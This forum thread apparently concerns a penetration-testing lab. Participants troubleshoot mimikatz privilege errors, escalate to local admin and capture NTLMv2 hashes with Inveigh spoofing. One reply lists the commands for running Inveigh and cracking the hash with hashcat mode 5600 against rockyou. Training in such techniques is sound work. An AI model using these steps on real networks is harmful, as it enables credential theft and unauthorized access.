Hi, on MS01 machine, I added ilfserveradm to local administrators group, but I am unable to get “privilege::debug” “OK” with mimikatz.
This is the error I get:
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz #
Any suggestion? Thank you!
Did you solve it? I am stuck at the same place.
sisobe
January 21, 2023, 6:37pm
3
It didn't work for me either, but try using netcat with the .bat file; it will work.
If anyone else has the same issue, you need to log out then back in.
1 Like
I am performing all the steps mentioned to add ilfserveradm to administrators group but it is not working. Can someone please help?
Hey guys, I got the admin and everything, but I'm stuck with the last flag. I imported Inveigh, but when I execute it I keep getting the following error:
PS C:\tmp\Inveigh> Import-Module .\Inveigh.ps1
Import-Module .\Inveigh.ps1
PS C:\tmp\Inveigh> Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
[*] Inveigh 1.506 started at 2023-06-08T03:45:44
[+] Elevated Privilege Mode = Enabled
[+] Primary IP Address = 172.16.8.50
[+] Spoofer IP Address = 172.16.8.50
[+] ADIDNS Spoofer = Disabled
[+] DNS Spoofer = Enabled
[+] DNS TTL = 30 Seconds
[+] LLMNR Spoofer = Enabled
[+] LLMNR TTL = 30 Seconds
[+] mDNS Spoofer = Disabled
[+] NBNS Spoofer = Disabled
[+] SMB Capture = Enabled
[+] HTTP Capture = Enabled
[+] HTTPS Capture = Disabled
[+] HTTP/HTTPS Authentication = NTLM
[+] WPAD Authentication = NTLM
[+] WPAD NTLM Authentication Ignore List = Firefox
[+] WPAD Response = Enabled
[+] Kerberos TGT Capture = Disabled
[+] Machine Account Capture = Disabled
[+] Console Output = Full
[+] File Output = Enabled
[+] Output Directory = C:\tmp\Inveigh
WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
Cannot see if a key has been pressed when either application does not have a console or when console input has been
redirected from a file. Try Console.In.Peek.
At C:\tmp\Inveigh\Inveigh.ps1:6365 char:20
+ if([Console]::KeyAvailable)
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OperationStopped: (:) [], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException
I looked for what causes the issue but I can’t find anything helpful.
beani
August 3, 2023, 7:34pm
7
The changes have to be applied to the system, maybe try a command like “gpupdate”
2 Likes
beani
August 3, 2023, 9:47pm
8
Could anyone please provide a hint on cracking the NTLMv2 hash (last question)? I am stuck and clearly missing something obvious.
Sure, so copy over Inveigh using: copy \\TSCLIENT\home\Inveigh.ps1
Next import the module: Import-Module Inveigh.ps1
Run Inveigh with: Invoke-Inveigh -ConsoleOutput Y -FileOutput Y
Wait until a hash pops up.
You can copy the hash.
You can run the following to find the right hash mode: hashcat --help | grep NTLM
You should use 5600, so your command can basically be the following:
hashcat -m 5600 "paste hash here" /usr/share/wordlists/rockyou.txt
You’ll get the password.
beani
August 4, 2023, 8:34pm
10
Hashcat constantly says “Exhausted”, do I have the wrong hash?
beani
August 4, 2023, 8:42pm
11
Nevermind, I in fact really had the wrong hash
All good I’ve done that countless times haha
1 Like
Noob1
September 13, 2023, 4:20pm
13
Can’t seem to do the privilege escalation, tried with adding the user to the administrators group and with nc.exe, if anyone can help would appreciate a DM!
paella
September 15, 2023, 8:45pm
15
Hi, I can’t connect to backupadm
If anyone has trouble with this in future, start a cmd prompt as admin… then when you come to put in the username do .\ilfserveradm → this uses local authentication as we’re local admin. Don’t want to authenticate against the domain
5 Likes
emdeh
October 9, 2023, 10:44pm
17
Great advice, the .\ before the username will make it sign in with the local admin account instead of the domain one.
Also, make sure you run mimikatz from an elevated cmd line. That stumped me for a while too.
1 Like
How did you get it to work? I'm stuck, please help someone.